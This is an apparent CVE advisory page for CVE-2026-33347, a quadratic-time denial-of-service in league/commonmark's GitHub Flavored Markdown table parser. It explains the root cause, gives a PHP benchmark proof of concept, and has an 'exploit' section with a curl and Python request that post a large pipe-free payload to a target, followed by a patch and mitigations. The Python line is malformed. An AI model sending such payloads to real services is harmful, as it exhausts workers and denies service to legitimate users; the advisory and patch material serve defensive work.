league/commonmark, Quadratic Complexity DoS, CVE-2026-33347 (High) -DC-Sep2026-2678

Listen to this Post

league/commonmark’s GitHub Flavored Markdown Table extension registers `TableStartParser` as a block-start parser. While a paragraph is the active block, the core block parser calls `TableStartParser::tryStart()` on every non-blank line. Its first action fetches the entire growing paragraph buffer via `getParagraphContent()` and runs `strpos($paragraph, ‘|’)` across all of it. For a paragraph of M pipe-free lines, line k rescans about k lines of buffer, so total work is 1+2+…+M, which is O(M^2). An unauthenticated user who submits a single large paragraph of pipe-free lines that do not begin with a letter to any service that converts untrusted Markdown with `GithubFlavoredMarkdownConverter` (or any environment that enables TableExtension) drives seconds to tens of seconds of single-core CPU that grows quadratically with body size, enough to exhaust worker processes and deny service.
The root cause is that the GFM table detector performs a per-line “quick check” against the whole accumulated paragraph rather than only the portion that could form a table header. A paragraph never closes while non-blank lines keep arriving, so its buffer grows without bound, and the quick check rescans the entire buffer on each line. Only the paragraph’s last line can ever be a table header, so scanning the full multi-line buffer for a pipe on every line is unnecessary work and creates quadratic time complexity. There is no input-size cap and the default nesting limit is not reached, so nothing bounds the scan. An unauthenticated, remote attacker with no user interaction can cause denial of service against any application that renders untrusted Markdown with the GitHub Flavored Markdown converter or any configuration that enables the Table extension. A single request carrying a large paragraph of pipe-free, blank-line-free lines that do not begin with a letter consumes CPU proportional to the square of the input size: measured runs show roughly 4x CPU growth per input doubling. A body of a few megabytes ties up a worker for seconds to tens of seconds; repeated or concurrent requests exhaust all available PHP worker processes, denying service to legitimate users. Impact is limited to availability; there is no confidentiality or integrity impact.

DailyCVE Form

Platform: league/commonmark
Version: 2.0.0-2.10.1
Vulnerability: Quadratic DoS
Severity: High
date: 2026-03-15

Prediction: 2026-06-01

What Undercode Say

Analytics

Install vulnerable package
composer require league/commonmark:2.10.1
Run PoC benchmark
php poc.php
<?php
require 'vendor/autoload.php';
use League\CommonMark\GithubFlavoredMarkdownConverter;
$converter = new GithubFlavoredMarkdownConverter();
foreach ([25000, 50000, 100000, 200000] as $lines) {
$md = str_repeat("12345678\n", $lines);
$t = microtime(true);
$converter->convert($md);
printf("%7d lines %6.3fs\n", $lines, microtime(true) - $t);
}

How Exploit: (Educational Purposes!)

curl -X POST https://target.com/markdown \
-H "Content-Type: text/plain" \
--data-binary @payload.txt
import requests
payload = "12345678\n" 200000
requests.post("https://target.com/markdown", data=payload)

Protection: from this CVE

// Patched TableStartParser.php
$paragraph = $parserState->getParagraphContent();
$lastNewline = strrpos($paragraph, "\n");
$lastLine = $lastNewline === false ? $paragraph : substr($paragraph, $lastNewline + 1);
if (strpos($lastLine, '|') === false) {
return BlockStart::none();
}
Interim mitigation: disable Table extension
Or cap input size before conversion

Impact:

Denial of service via CPU exhaustion. Unauthenticated remote attacker can exhaust PHP worker processes with a single request. Impact limited to availability; no confidentiality or integrity impact.

🎯Let’s Practice Exploiting & Learn Patching For Free:

🎓 Live Courses & Certifications:

Join Undercode Academy for Verified Certifications

🚀 Request a Custom Project:

Secure, high-velocity infrastructure and disruptive technological engineering. Contact our engineering team for high-tier development and proprietary systems:
[email protected]
💎 Smart Architecture | 🛡️ Secure by Design | ⭐ Trusted by Thousands

Sources:

Reported By: github.com
Extra Source Hub:
Undercode

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow DailyCVE & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin Featured Image

Scroll to Top